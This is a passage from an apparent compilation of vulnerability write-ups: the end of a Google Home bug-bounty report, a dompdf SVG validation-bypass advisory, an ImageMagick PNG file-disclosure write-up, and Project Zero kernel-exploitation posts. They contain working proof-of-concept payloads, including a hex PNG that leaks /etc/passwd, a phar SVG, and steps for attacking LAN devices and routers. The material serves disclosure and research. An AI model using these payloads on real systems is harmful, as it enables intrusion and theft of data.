       request it receives when the Google Home finds itself through mDNS scanning, then connects to the Chrome DevTools Protocol WebSocket on port 9222. After connecting to CDP, it opens a WebSocket to your C&C server, and waits for commands. If disconnected from either CDP or the C&C server, it automatically tries to reconnect every 5 seconds.
    • Once loaded, it seems to run indefinitely. The documentation says apps may be killed if they consume too much memory, but I haven’t run into this, and I’ve even left my app running overnight. If the Google Home is rebooted, the app will reload.

Now, you can send HTTP(S) requests on the victim’s private LAN, as if you had the WiFi password, even though you don’t (yet), by configuring a program on your computer to route its traffic through the local proxy server, which in turn routes it to the Google Home. For example, 

curl --proxy 'localhost:8000' --insecure -v https://localhost:8443/setup/eureka_info
 returns the Google Home’s info, because through the proxy, 
localhost
 resolves to the Google Home’s IP. The JSON response to 
/setup/eureka_info
 contains the IP, which is helpful for determining the layout of the LAN.

I was even able to route Chrome through the proxy, with 

chrome --proxy-server='localhost:8000' --ignore-certificate-errors --user-data-dir='SOME_DIR'
, and it worked surprisingly well.

Obviously, the ability to send requests on the private LAN opens a large attack surface. Using the IP of the Google Home, you can determine the subnet that the victim’s other devices are on. For example, my Google Home’s IP is 

192.168.86.132
, so I could guess that my other devices are in the  
192.168.86.0
 to 
192.168.86.255
 range. You could write a simple script to 
curl
 every possible address, looking for devices on the LAN to attack or steal data from. Since it only takes a few seconds to check each IP, it would only take around 10 minutes to try every one. On my LAN, I found my printer’s web interface at 
http://192.168.86.33
. Its network settings page contains an 
&lt;input type="password"&gt;
 pre-filled with my WiFi password in plaintext. It also provides a firmware update mechanism, which I imagine could be vulnerable to attack.

Another approach would be looking for the victim’s router and trying to attack that. My router’s IP, 

192.168.1.254
, shows up among the first results when you Google “default router IPs”. You could write a script to try these. My router’s configuration interface also immediately returns my WiFi password in plaintext. Luckily, I’ve changed the default admin password, so at the very least an attacker with access to it wouldn’t be able to modify the settings, but most people don’t change this password, so you could find it by searching for “[brand name] router password”, then set the DNS server to your own, install malicious firmware updates, etc. Even if the victim changed their router’s password, it may still be vulnerable. For example, in June 2020, a researcher found a buffer overflow vulnerability in the web interface on 79 Netgear router models that led to a root shell, and described the process as “easy”.

PoC #3: Read/write arbitrary files on device

I also found a way to read/write arbitrary files on the linked device using the 

DOM.setFileInputFiles
 and 
Page.setDownloadBehavior
 methods of the Chrome DevTools Protocol.

The following reproduction steps first write a file, 

/tmp/example_file.txt
, then read it back to verify that it worked.

  1. Enable remote debugging on the Google Home:
  2. Install the requirements:
npm install ws
pip install flask
  1. Create an 
    example_file.txt
    , e.g. 
    echo 'test' &gt; example_file.txt
  2. Run 
    python3 write_server.py example_file.txt
    . You can optionally modify the 
    HOST
     or 
    PORT
     variables at the top of the script. Get the URL of the server, like 
    http://[IP]:[port]
    . This must be reachable by the Google Home.
  3. Run 
    node write.js [Google Home IP] [write server URL] /tmp
    , inserting the appropriate values. You can get the Google Home’s IP from the Google Home app. The file will be written to 
    /tmp/example_file.txt
    .
  4. Run 
    python3 read_server.py
    . You can modify the host/port like before.
  5. Run 
    node read.js [Google Home IP] [read server URL]
    . When prompted for a file path to read, enter 
    /tmp/example_file.txt
    .
  6. Verify that 
    example_file.txt
     was dumped from the device to 
    dumped_files/example_file.txt

Since I couldn’t explore the filesystem of my Google Home (and 

&lt;input type="file" webkitdirectory&gt;
 didn’t work to upload folders instead of files), I’m not sure exactly what the impact of this was. I was able to find some info about the filesystem structure from the “open source licenses” info, and from the DEFCON talk on the Google Home. I dumped a few binaries like 
/system/chrome/cast_shell
 and 
/system/chrome/lib/libassistant.so
, then ran 
strings
 on them, looking for interesting files to steal or tamper with. It looks like 
/data/chrome/chirp/assistant/cookie
 may contain user info? 
/data/chrome/chirp/assistant/settings
and 
/data/chrome/chirp/assistant/phenotype_package_store
 both contain the GAIA IDs of the accounts linked to my Google Home. I was able to dump 
/data/chrome/chirp/assistant/nightmode/nightmode_params
, hex edit it, and overwrite the original with my modified version, and the changes were applied after a reboot. If, for example, a bug in a config file parser was found, I imagine that this could have potentially led to RCE?

The fixes

I’m aware of the following fixes deployed by Google:

  • You must request an invite to the “Home” that the device is registered to in order to link your account to it through the 
    /deviceuserlinksbatch
     API. If you’re not added to the Home but you try to link your account this way, you’ll get a 
    PERMISSION_DENIED
     error.
  • “Call [phone number]” commands can’t be initiated remotely through routines.

You can still deauth the Google Home and access its device info through the 

/setup/eureka_info
 endpoint, but you can’t use it to link your account anymore, and you can’t access the rest of the local API (because you can’t get a local auth token).

On devices with a display (e.g. Google Nest Hub), the setup network is protected with a WPA2 password which appears as a QR code on the display (scanned with the Google Home app), which adds an additional layer of protection.

Additionally, on these devices, you can say “add my voice” to bring up a screen with a link code instructing you to visit https://g.co/nest/voice. You can link your account to the device through this website, even if you aren’t added to its Home (which is fine, because this still requires physical access to the device). The “add my voice” command doesn’t appear to work on the Google Home Mini, probably since it doesn’t have a display that it can use to provide a link code. I guess if Google wanted to implement this, they could make it speak the link code out loud or text it to a provided phone number or something.

Reflection/conclusions

Google Home’s architecture is based on Chromecast. Chromecast doesn’t place much emphasis on security against proximity-based attacks because it’s mostly unnecessary. What’s the worst that could happen if someone hacks your Chromecast? Maybe they could play obscene videos? However, the Google Home is a much more security-critical device, due to the fact that it has control over your other smart home devices, and a microphone. If the Google Home architecture had been built from scratch, I imagine that these issues would have never existed.

Ever since the first Google Home device released in November 2016, Google continued to add more and more features to the device’s cloud APIs as time went on, like scheduled routines (July 2018) and the Local Home SDK (April 2020). I’m guessing that the engineers behind these features were under the assumption that the account linking process was secure.

Many other security researchers had already given the Google Home a look before me, but somehow it appears that none of them noticed these seemingly glaring issues. I guess they were mainly focused on the endpoints that the local API exposed and what an attacker could do with those. However, these endpoints only allow for adjusting a few basic device settings, and not much else. While the issues I discovered may seem obvious in hindsight, I think that they were actually pretty subtle. Rather than making a local API request to control the device, you instead make a local API request to retrieve innocuous-looking device info, and use that info along with cloud APIs to control the device.

As the DEFCON talk shows, the low-level security of the device is generally pretty good, and buffer overflows and such are hard to come by. The issues I found were lurking at the high level.

Many thanks to Google for the incredibly generous rewards!

Disclosure timeline

  • 01/08/2021: Reported
  • 01/10/2021: Triaged
  • 01/20/2021: Closed (Intended Behavior)
  • I was busy with school stuff, so it took me a while to respond
  • 03/11/2021: Sent additional details and PoC
  • 03/19/2021: Reopened
  • 04/07/2021: Sent additional details
  • 04/20/2021: Reward received
  • 04/05/2022: Google announced increased rewards for Google Nest and Fitbit devices
  • 05/04/2022: Bonus rewards received

Prior research

Here are some articles I found during my research on Google Home devices that I thought were interesting:

Footnote: Static analysis of Google Home app

During my research, I did a little digging within the Google Home app. I didn’t find any security issues here, but I did discover some things about the local API that the unofficial docs don’t yet include.

show_led
 endpoint

To find a list of local API endpoints (and potentially some undocumented ones), I searched for a known endpoint (

get_app_device_id
) in the decompiled sources:

The information I was looking for was in 

defpackage/ufo.java
:

SHOW_LED
 sounded interesting, and it wasn’t in the unofficial docs. Searching for where this constant is used led me to 
StereoPairCreationActivity
:

With the help of JADX’s amazing “rename symbol” feature, and after renaming some methods, I was able to find the class responsible for constructing the JSON payload for this endpoint:

Looks like the payload consists of an integer 

animation_id
. We can send use the endpoint like so:

$ curl --insecure -X POST -H 'cast-local-authorization-token: [token]' -H 'Content-Type: application/json' -d '{"animation_id":2}' https://[Google Home IP]:8443/setup/assistant/show_led

This makes the LEDs play a slow pulsing animation. Unfortunately it seems that there are only two animations: 

1
(reset LEDs to normal) and 
2
 (continuous pulsing). Oh, well.

Wi-Fi password encryption

I was also able to find the algorithm used to encrypt the user’s Wi-Fi password before sending it through the 

/setup/connect_wifi
 endpoint. Now that HTTPS is used, this encryption seems redundant, but I imagine that this was originally implemented to protect against MITM attacks exposing the Wi-Fi password. Anyway, we see that the password is encrypted using RSA PKCS1 and the device’s public key (from 
/setup/eureka_info
):

Footnote: Deauth attacks on Google Home Mini

I mentioned above that the Google Home Mini doesn’t support WPA3, nor 802.11w. I’d like to clarify how I discovered this.

Since my router doesn’t support these, I borrowed a friend’s router running OpenWrt, a FOSS operating system for routers, which does support 802.11w and WPA3.

There are three 802.11w modes you can choose from: disabled (default), optional, and required. (“Optional” means that it’s used only for devices that support it.) While I was using “required”, my Google Home Mini was unable to connect, meanwhile my Pixel 5 (Android 12) and MacBook Pro (macOS 12.4) had no issues. Same results when I enabled WPA3. I tried “optional” and the Google Home Mini connected, but was still vulnerable to deauth attacks (as expected).

I tested this on the latest Google Home Mini firmware at the time of writing (1.56.309385, August 2022), on 1st gen (codename 

mushroom
) hardware. I’m assuming this is a limitation of the Wi-Fi chip that it uses, rather than a software issue.

Dompdf vulnerable to URI validation failure on SVG parsing

Original text by Blaklis

Summary

The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing 

&lt;image&gt;
 tags with uppercase letters. This might leads to arbitrary object unserialize on PHP < 8, through the 
phar
 URL wrapper.

Details

The bug occurs during SVG parsing of 

&lt;image&gt;
 tags, in src/Image/Cache.php :

if ($type === "svg") {
    $parser = xml_parser_create("utf-8");
    xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false);
    xml_set_element_handler(
        $parser,
        function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) {
            if ($name === "image") {
                $attributes = array_change_key_case($attributes, CASE_LOWER);

This part will try to detect 

&lt;image&gt;
 tags in SVG, and will take the href to validate it against the protocolAllowed whitelist. However, the `$name comparison with «image» is case sensitive, which means that such a tag in the SVG will pass :

<svg>
    <Image xlink:href="phar:///foo"></Image>
</svg>

As the tag is named «Image» and not «image», it will not pass the condition to trigger the check.

A correct solution would be to strtolower the 

$name
 before the check :

if (strtolower($name) === "image") {

PoC

Parsing the following SVG file is sufficient to reproduce the vulnerability :

<svg>
    <Image xlink:href="phar:///foo"></Image>
</svg>

Impact

An attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can provide a SVG file to dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available.

References

ImageMagick: The hidden vulnerability behind your online images

ImageMagick: The hidden vulnerability behind your online images

Original text byMetabase Q Team By Bryan Gonzalez from Ocelot Team

Introduction

ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats and, therefore, is very common to find it in websites worldwide since there is always a need to process pictures for users’ profiles, catalogs, etc.

In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images in a Drupal-based website, and hence, the team decided to try to find new vulnerabilities in this component, proceeding to download the latest version of ImageMagick, 7.1.0-49 at that time. As a result, two zero days were identified:

  • CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
  • CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).

How to trigger the exploitation?

An attacker needs to upload a malicious image to a website using ImageMagick, in order to exploit the above mentioned vulnerabilities remotely.

The Ocelot team is very grateful for the team of volunteers of ImageMagick, who validated and released the patches needed in a timely manner:

https://github.com/ImageMagick/ImageMagick/commit/05673e63c919e61ffa1107804d1138c46547a475

In this blog, the technical details of the vulnerabilities are explained.

CVE-2022-44267: Denial of service

ImageMagick:  7.1.0-49

When ImageMagick parses a PNG file, for example in a resize operation when receiving an image, the convert process could be left waiting for stdin input leading to a Denial of Service since the process won’t be able to process other images.

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile. If the specified filename is “-“ (a single dash) ImageMagick will try to read the content from standard input potentially leaving the process waiting forever.

Exploitation Path Execution:

  • Upload image to trigger ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164)
Reading “tEXt” chunk:

SetImageProfile (MagickCore/property.c:4360):
Checking if keyword equals to “profile”:
Copying the text string as filename in line 4720 and saving the content in line 4722:
FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):
const size_t extent, ExceptionInfo *exception)
{
StringInfo
*string_info;
assert(filename != (const char *) NULL);
assert(exception != (ExceptionInfo *) NULL);
if (IsEventLogging () != MagickFalse)
(void) LogMagickEvent (TraceEvent, GetMagickModule (), "%s", filename);
string_info=AcquireStringInfoContainer();
string_info-›path=ConstantString(filename);
string_info-›datum=(unsigned char *) FileToBlob(filename, extent,
&string_info-›length,exception);
if (string_info-›datum == (unsigned char *) NULL)
{
string_info=DestroyStringInfo(string_info);
return ((StringInfo *) NULL);
return(string_info);
}

FileToBlob (MagickCore/blob.c:1396): Assigning stdin to a filename as “-”, causing the process to wait for input forever:

file=fileno(stdin);
if (LocaleCompare(filename, " -") ! = 0)
{
status=GetPathAttributes (filename, &attributes) ;
if ((status == MagickFalse) || (S_ISDIR(attributes.st_mode) != 0))
{
ThrowFileException(exception, BlobError, "UnableToReadBlob" ,filename);
return (NULL);
?
file=open_utf8 (filename, O_RDONLY | O_BINARY, 0);
}
if (file == -1)
{
ThrovFileException(exception, BlobError, "UnableTo0penFile", filename);
return (NULL);
}
offset=(MagickOffsetType) Iseek(file, O, SEEK_END);
count=0;
if ((file == fileno (stdin)) (offset < 0)
(offset != (MagickOffsetType) ((ssize_t) offset)))
{
size t
quantum;
struct stat
file stats;
/*
Stream is not seekable.
* /
offset= (MagickOffsetType) Iseek(file,O, SEEK_SET);
quantum= (size t) MagickMaxBufferExtent;
if ((fstat (file, &file_stats) == 0) && (file_stats.st_size > 0))
quantum= (size_t) MagickMin(file stats.st_ size,MagickMaxBufferExtent);
blob=(unsigned char *) AcquireQuantumMemory (quantum, sizeof (*blob));
for (i=0; blob != (unsigned char *) NULL; i+=count)
{
count=read(file, blob+i, quantum);

PoC: Malicious PNG File:

89504E470D0A1A0A0000000D49484452000000010000000108000000003A7E9B550000000B49444154789C63F8FF1F00030001FFFC25DC510000000A7445587470726F66696C65002D00600C56A10000000049454E44AE426082

Evidence: Malicious image file: OCELOT_output.png

Stdin input waiting forever:

CVE-2022-44268: Arbitrary Remote Leak

ImageMagick:  7.1.0-49

When ImageMagick parses the PNG file, for example in a resize operation, the resulting image could have embedded the content of an arbitrary remote file from the website (if magick binary has permissions to read it).

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.

Exploitation Path Execution:

  • Upload image to trigger ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164):

– Reading tEXt chunk:

SetImageProfile (MagickCore/property.c:4360)

Checking if keyword equals to “profile”

Copying the text string as filename in line 4720 and saving the content in line 4722:

FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):

If a valid (and accessible) filename is provided, the content will be returned to the caller function (FileToStringInfo) and the StringInfo object will return to the SetImageProperty function, saving the blob into the new image generated, thanks to the function SetImageProfile:

This new image will be available to download by the attackers with the arbitrary website file content embedded inside.

PoC: Malicious PNG content to leak “/etc/passwd” file:

89504E470D0A1A0A0000000D4948445200000001000000010100000000376EF9240000000A49444154789C636800000082008177CD72B6000000147445587470726F66696C65002F6574632F70617373776400B7F46D9C0000000049454E44AE426082

Evidence:

Content of the /etc/passwd stored in the image via profile->datum variable:

Hexadecimal representation of the /etc/passwd content, extracted from the image:

Content from /etc/passwd in the website, received in the image generated:

Video showing the exploitation:

Exploiting null-dereferences in the Linux kernel

Exploiting null-dereferences in the Linux kernel

Original text by Seth Jenkins, Project Zero

For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.

Kernel oops overview

At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops — instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred — however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.

The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.

Reference count mismanagement overview

Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 232 times.

Example null-deref bug

When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example — an otherwise unrelated bug I coincidentally discovered in the very recent past:

static int show_smaps_rollup(struct seq_file *m, void *v)
{
        struct proc_maps_private *priv = m->private;
        struct mem_size_stats mss;
        struct mm_struct *mm;
        struct vm_area_struct *vma;
        unsigned long last_vma_end = 0;
        int ret = 0;
        priv->task = get_proc_task(priv->inode); //task reference taken
        if (!priv->task)
                return -ESRCH;
        mm = priv->mm; //With no vma's, mm->mmap is NULL
        if (!mm || !mmget_not_zero(mm)) { //mm reference taken
                ret = -ESRCH;
                goto out_put_task;
        }
        memset(&mss, 0, sizeof(mss));
        ret = mmap_read_lock_killable(mm); //mmap read lock taken
        if (ret)
                goto out_put_mm;
        hold_task_mempolicy(priv);
        for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {
                smap_gather_stats(vma, &mss);
                last_vma_end = vma->vm_end;
        }
        show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here
        seq_pad(m, ' ');
        seq_puts(m, "[rollup]\n");
        __show_smap(m, &mss, true);
        release_task_mempolicy(priv);
        mmap_read_unlock(mm);
out_put_mm:
        mmput(mm);
out_put_task:
        put_task_struct(priv->task);
        priv->task = NULL;
        return ret;
}

This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):

This kernel oops will mean that the following events occur:

  1. The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
  2. The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
  3. The task struct associated with the smaps_rollup file will have a refcount leaked
  4. The mm_struct’s mm_users refcount associated with the task will be leaked
  5. The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)

Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of events 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4. 


The mm_users refcount still uses an overflow-unsafe atomic_t and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple important roadblocks we need to avoid in order to repeatedly leak this refcount:

  1. We cannot call this syscall from the task with the empty vma list itself — in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
  2. We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
  3. If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM
  4. We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.

Our final refcount leaking overflow strategy is as follows:

  1. Process A forks a process B
  2. Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
  3. Proces B clones with CLONE_VM | CLONE_PTRACE another process C
  4. Process B munmap’s its entire virtual memory address space — this also unmaps process C’s virtual memory address space.
  5. Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
  6. (D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
  7. Process A goes back to step 5 ~232 times

The above strategy can be rearchitected to run in parallel (across processes not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 232 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.

Exploitation

Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:

static inline void __mmput(struct mm_struct *mm)
{
        VM_BUG_ON(atomic_read(&mm->mm_users));
        uprobe_clear_state(mm);
        exit_aio(mm);
        ksm_exit(mm);
        khugepaged_exit(mm);
        exit_mmap(mm);
        mm_put_huge_zero_page(mm);
        set_mm_exe_file(mm, NULL);
        if (!list_empty(&mm->mmlist)) {
                spin_lock(&mmlist_lock);
                list_del(&mm->mmlist);
                spin_unlock(&mmlist_lock);
        }
        if (mm->binfmt)
                module_put(mm->binfmt->module);
        lru_gen_del_mm(mm);
        mmdrop(mm);
}

Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.

However, before the call permanently deadlocks, it will call several other functions:

  1. uprobe_clear_state
  2. exit_aio
  3. ksm_exit
  4. khugepaged_exit

Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.

This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:

void exit_aio(struct mm_struct *mm)
{
        struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
        struct ctx_rq_wait wait;
        int i, skipped;
        if (!table)
                return;
        atomic_set(&wait.count, table->nr);
        init_completion(&wait.comp);
        skipped = 0;
        for (i = 0; i < table->nr; ++i) {
                struct kioctx *ctx =
                rcu_dereference_protected(table->table[i], true);
                if (!ctx) {
                        skipped++;
                        continue;
                }
                ctx->mmap_size = 0;
                kill_ioctx(mm, ctx, &wait);
        }
        if (!atomic_sub_and_test(skipped, &wait.count)) {
                /* Wait until all IO for the context are done. */
                wait_for_completion(&wait.comp);
        }
        RCU_INIT_POINTER(mm->ioctx_table, NULL);
        kfree(table);
}

While the callee function kill_ioctx is written in such a way to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:

Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.

Conclusion

While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.

Exploiting CVE-2022-42703 — Bringing back the stack attack

Exploiting CVE-2022-42703 - Bringing back the stack attack

Original text by Seth Jenkins, Project Zero

This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 — Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel’s memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is and the commit that introduced the bug are great resources in order to gain additional context.

Setting the scene

Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(…, MADV_PAGEOUT)can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():

struct anon_vma *folio_lock_anon_vma_read(struct folio *folio,
					  struct rmap_walk_control *rwc)
{
	struct anon_vma *anon_vma = NULL;
	struct anon_vma *root_anon_vma;
	unsigned long anon_mapping;

	rcu_read_lock();
	anon_mapping = (unsigned long)READ_ONCE(folio->mapping);
	if ((anon_mapping & PAGE_MAPPING_FLAGS) != PAGE_MAPPING_ANON)
		goto out;
	if (!folio_mapped(folio))
		goto out;

	// anon_vma is dangling pointer
	anon_vma = (struct anon_vma *) (anon_mapping - PAGE_MAPPING_ANON);
	// root_anon_vma is read from dangling pointer
	root_anon_vma = READ_ONCE(anon_vma->root);
	if (down_read_trylock(&root_anon_vma->rwsem)) {
[...]
		if (!folio_mapped(folio)) { // false
[...]
		}
		goto out;
	}

	if (rwc && rwc->try_lock) { // true
		anon_vma = NULL;
		rwc->contended = true;
		goto out;
	}
[...]
out:
	rcu_read_unlock();
	return anon_vma; // return dangling pointer
}

One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.

Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker controlled memory.

At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:

struct rw_semaphore {
	atomic_long_t count;
	atomic_long_t owner;
	struct optimistic_spin_queue osq; /* spinner MCS lock */
	raw_spinlock_t wait_lock;
	struct list_head wait_list;
};

...

static inline int __down_read_trylock(struct rw_semaphore *sem)
{
	long tmp;

	DEBUG_RWSEMS_WARN_ON(sem->magic != sem, sem);

	tmp = atomic_long_read(&sem->count);
	while (!(tmp & RWSEM_READ_FAILED_MASK)) {
		if (atomic_long_try_cmpxchg_acquire(&sem->count, &tmp,
						    tmp + RWSEM_READER_BIAS)) {
			rwsem_set_reader_owned(sem);
			return 1;
		}
	}
	return 0;
}

It was helpful to emulate the down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer and we cannot modify any non 8-byte aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.

Stack corruption…

